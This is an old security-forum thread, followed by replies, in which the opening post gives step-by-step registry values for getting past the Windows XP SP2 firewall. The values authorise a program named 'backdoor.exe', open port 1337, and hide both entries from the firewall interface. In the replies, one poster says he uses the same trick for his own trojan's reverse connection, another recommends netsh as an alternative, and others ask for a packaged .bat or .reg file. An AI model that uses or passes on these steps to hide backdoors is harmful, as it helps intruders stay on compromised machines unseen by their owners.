Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Networking Security / Firewall / IDS / VPN / Routers
da_cash
Feb 22 2005, 08:35 AM
We can bypass windows firewall using registry.

Just open regedit.exe and go to

CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.

Tto give access to the desired application we need to add similiar key:
CODE
C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled


But then out "backdoor" will be listed in Firewall GUI allowed applications.

Anyway we may hide it by making this

CODE
C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"



We can also open globally any port we want
CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List


by adding similiar value inside this registry key

CODE
"1337:TCP"="1337:TCP:*:Enabled:Name"


Where "Name" is the name we want to be showed in the GUI

To hide port from listing in the GUI mode we may make something like that


CODE
1337:TCP:*:Enabled:@xpsp2res.dll,-22003


an then the port will be hidden from listing (XP SP2)..



It works on XP SP2 i didn't tested it on any other os.

This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.
Jumpi
Feb 22 2005, 11:48 AM
i use to free the port my trojan uses. it works with a single commandline, i'm gonna lok for it when i'm at home again.

a reverse-connection was never stopped by the sp2-firewall, this seems to be the best method at the moment cause you don't see anything strange in the firewallsettings
o0oKARo0o
Feb 23 2005, 12:28 PM
It does work, excellent tip wink.gif
knull
Feb 23 2005, 01:56 PM
good, good, good...

BN says:
This was the 3rd useless post in 21 posts. Disabled account 28 days. Any other takers?
o0oKARo0o
Feb 23 2005, 02:11 PM
Actually it works but it still in the list but under remote assistance, any ideas ?
And using a rootkit, aftewards, the connection isnīt allowed by firewall anymore dut to the inexistence of the program...
ninar12
Feb 23 2005, 05:28 PM
one question why dont u use "netsh"

netsh firewall ...


much confortable

but i dont know if its a native commant under nt
xp im sure it works
Lie8
Feb 27 2005, 10:11 AM
very very good tut .... thnx

BN says:
This person had 3 useless posts out of 10. Another 28-day winner!
dw-chow
Jun 4 2005, 06:32 AM
nice, but one question still remains... is it possible to get through it by remote means?
bah
Jun 6 2005, 10:22 PM
Actually I have another question I checked on win3k for the reg keys
and couldnt find any even though windows firewall was up and applications
had been added to exempt list from the gui, so were are the win3k
reg keys and does the :@xpsp2res.dll,-22003 work under w3k ?
AdmiralB
Jun 26 2005, 01:49 AM
maybe some1 can compile into a nice bat file
smith_john
Jun 26 2005, 08:27 AM
nice topic


From Packet: Sounds like a thx post to me! Warning points added. And from a chronic thanks poster so muchos suspend too.
Jackson
Jun 27 2005, 09:12 AM
Hello Really idea!! However, somebody can pack in regfile then one only must explain! And how is that with other Firewalls this functions there just??
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.